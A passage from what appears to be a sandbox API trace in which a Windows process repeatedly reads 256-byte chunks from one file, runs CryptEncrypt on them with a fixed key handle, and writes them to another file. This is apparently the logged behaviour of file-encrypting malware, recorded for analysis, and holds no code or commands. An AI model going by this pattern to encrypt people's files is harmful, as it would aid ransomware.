lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.023] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.023] GetLastError () returned 0x0 [0164.023] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.023] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.024] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.024] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.024] GetLastError () returned 0x0 [0164.024] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.025] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.025] GetLastError () returned 0x0 [0164.025] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.025] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.026] GetLastError () returned 0x0 [0164.026] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.026] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.026] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.027] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.027] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.027] GetLastError () returned 0x0 [0164.027] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0164.028] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0164.028] GetLastError () returned 0x0 [0164.028] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0164.028] ReadFile (in: hFile=0x1624, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, 